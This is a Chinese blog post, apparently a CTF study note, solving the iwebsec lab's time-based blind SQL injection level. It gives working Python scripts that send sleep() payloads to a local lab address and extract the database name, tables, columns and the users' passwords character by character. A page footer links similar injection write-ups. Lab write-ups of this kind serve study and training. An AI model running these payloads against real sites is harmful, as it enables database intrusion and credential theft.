CTF学习笔记6:iwebsec-SQL注入漏洞-04-sleep注入

已于 2022-01-23 11:14:56 修改
阅读量627 收藏
点赞数
分类专栏: CTF 文章标签: sql 安全 web安全
于 2022-01-22 23:23:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lifeng_dc/article/details/122645441
版权

目录

一、解题过程

(一)观察页面

发现不论输入的payload正确与否,页面输出是一样的,所以不能bool注入

(二)编写脚本逐项获取数据

1.获取数据库名的长度(可不做)

#encoding=utf-8
import requests
import os
import time

url="http://192.168.182.130:8001/sqli/04.php"

def DbLen():
	for i in range(1,10):
		payload="?id=if(length(database())={},sleep(1),1)--+".format(i)
		req_url=url+payload
		start_time=time.time()
		rep=requests.get(url=req_url)
		end_time = time.time()
		t = end_time - start_time
		if t > 1:
			print("DB length is "+str(i))
DbLen()

在这里插入图片描述

2.获取数据库名(可不做)

def DbName():
	result=""
	for i in range(1,8):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i,mid)
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
DbName()

在这里插入图片描述

3.获取表名

def TablesName():
	result=""
	for i in range(1,50):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=if(ord(mid((select group_concat(table_name) 
			from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+'''.format(i,mid)
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
TablesName()

在这里插入图片描述

4.获取users表的列名

def ColumnsName():
	result=""
	for i in range(1,30):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=if(ord(mid((select group_concat(column_name) 
				from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{},sleep(1),1) --+'''.format(i,mid)			
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
ColumnsName()

在这里插入图片描述

5.获取password列的数据

def GetData():
	result=""
	for i in range(1,50):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=if(ord(mid((select group_concat(password) from iwebsec.users),{},1))>{},sleep(1),1) --+".format(i,mid)			
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
GetData()

在这里插入图片描述

二、源码分析

(一)php源码

在这里插入图片描述

(二)脚本关键部分

在这里插入图片描述

lvx++
关注
专栏目录
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
sql注入基础(ctfhub sql注入
kofi的博客,已停更
08-15 771
(持续更新中)sql注入基础0x00 前言 0x00 前言 这两天在CTFHub上练题,刚好练到了SQL注入这个之前我一直也不是很懂,这回一做发现其中大有玄妙,所以就一起写个小总结。 CTFhHub:https://www.ctfhub.com/#/index 上面这张图是CTFHub的SQL注入技能树 ...
iwebsec靶场SQL注入-sleep注入
最新发布
qq_56041380的博客
03-26 315
sleep注入是另一种盲注方式,与bool注入不同,sleep注入没有任何报错信息输出,页面返回不管对错都只是一种状态,攻击者无法通过页面返回状态来判断输入的SQL注入测试语句是否正确,只能通过构造sleep注入SQL测试语句,根据页面返回的返回时间判断数据库中存储了哪些信息
iwebsec--sql注入漏洞
追求卓越,技术流~
11-20 1813
sql注入漏洞
SQL注入漏洞 | iwebsec
weixin_52116519的博客
11-28 833
这种网站内部直接发送的Sql请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句,如果用户输入的数据被构造成恶意 Sql 代码,Web 应用又未对动态构造的 Sql 语句使用的参数进行审查,则会带来意想不到的危险。Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。可能是云服务器的安全组没开,确实没开,哈哈哈哈。简单来说就是,后台服务器接收用户输入的参数后,
iwebsec靶场SQL注入漏洞-字符型注入
qq_56041380的博客
03-23 568
字符型注入就是注入点的数据类型是字符型。字符型注入与数字型注入的区别就是字符型注入要用一对单引号引起来。
CTF学习笔记11:iwebsec-SQL注入漏洞-09-双写关键字绕过
lvx++的博客
01-23 869
一、解题过程 感觉题目越来越简单,只需绕过select关键字过滤即可 ?id=-1 union selselectect 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users
CTFHUB-web-SQL注入
ookami6497的博客
11-29 814
CTFHUB SQL
通过ctfshow学习sql注入
一只菜鸡
02-23 537
CTFSHOW-SQL注入 CTFshow-web入门-SQL注入 web171 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 可以看出来有三个字段,那可以直接联合查询看看 1' union select 1,2,3%23 1' union select database(),2,3%23 1' un
cmd echo写入shell_学习笔记-命令执行及花式bypass写shell
weixin_30801745的博客
01-26 1772
命令执行的坑其实早就想填了。最早是因为校赛时,easyphp一题自己因为不熟悉命令执行的一些特性导致套娃题绕到最后一层却没拿到flag。当时十分不爽,下定决心要好好了解下命令执行的相关知识点。关于命令执行我大体上归为php绕过+rce两类。php的难点主要是在绕过写shell上,而linux的知识主要在RCE达成上。先从简单说起:linux 命令& RCErce,即remote comma...
CTF学习笔记2:iwebsec-SQL注入漏洞-01-数字型注入
lvx++的博客
01-22 3727
提示:本篇为最简单的SQL注入入门,是在自己本地虚拟机的靶场上练习,为的是了解安全防御技术。切勿在未经授权的情况下,测试或攻击他人网站或系统,否则将承担法律责任!请学习《网络安全法》。 一、解题过程 用到的工具:Chrome浏览器和HackerBar插件 (一)题目概览 1.题目路径 2.HackerBar使用 3.测试结果集列数为3列 ?id=1 order by 4 4.给id传递-1再用union select查询自己想要的数据 (1)取得当前应用的数据库名 ?id=-1 union sele
iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)
mooyuan的博客
11-26 1695
iwebsec靶场的SQL注入漏洞的第04sleep注入漏洞渗透,iwebsec靶场的时间型盲注由于没有任何过滤信息,与bool型盲注一样为数字型布尔盲注,故而使用sqlmap渗透十分方便高效。时间型盲注相对而言十分耗时,手注或者半自动化注入相对而言操作过程较为麻烦,初学者还是应该以手动与半自动化注入结合方法练习,真正了解原理后可以在使用sqlmap来提升速度。
CTF学习笔记5:iwebsec-SQL注入漏洞-03-bool注入
lvx++的博客
01-22 1368
一、解题过程 (一)观察payload与结果 1.SQL执行有结果,就输出welcome to iwebsec!!! 2.否则输出1 (二)编写脚本逐项获取信息 1.获取数据库名字符串长度 先要为python安装requests包 pip install requests python代码如下: #encoding=utf-8 import requests import os url="http://192.168.182.130:8001/sqli/03.php" def DbLen():
绕过waf mysql爆库_iwebsec刷题记录-SQL注入漏洞
weixin_39928844的博客
02-12 831
被推荐了这个web平台,感觉挺适合新手的,网上搜了下没看到有人写wp,这里本入门萌新来稍微整理下自己解题的过程SQL注入漏洞01-数字型注入http://localhost:32774/sqli/01.php?id=1'发现有报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL...
CTF学习笔记10:iwebsec-SQL注入漏洞-08-大小写过滤绕过
lvx++的博客
01-23 937
一、解题过程 将SQL关键都换成大小写交替,最后经查看源码,本题只过滤了select ?id=-1 Union Select 1,2,Group_concat(concat(username,0x7e,password)) From iwebsec.users
ctf】布尔型注入
chualam的博客
11-03 321
步骤:猜数据库名字长度--猜数据库名字 --猜单数量--猜单名字长度 --猜单名字--猜字段数量--猜字段长度--猜字段 1 and length(database())>3 1 and mid(database(),1,1)='a' //用substr函数也行 1 and ascii(substr((select database()),1,1))='数字' 1 and left(database(),4)='sqli' //判断字符串 1 and 1=((select count.
iwebsec靶场SQL注入漏洞-数字型注入
qq_56041380的博客
03-23 373
group_concat()是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。information_schema数据库存储了SCHEMATA,TABLES和COLUMNS。information_schema数据库是MYSQL自带的数据库,它提供访问数据库元数据的方式。我们可以看到当前数据库的sqli,user,users,xss。当把order by 里的数字加到4列时显示。测试3列结果还是显示正常。
iwebsec sql注入篇(详细过程,完结)
qq_60829702的博客
03-19 2301
iwebsec靶场,SQL注入篇,详细过程,全篇完结
iwebsec靶场(sql注入
果粒程
02-24 1072
iwebsec靶场(sql注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值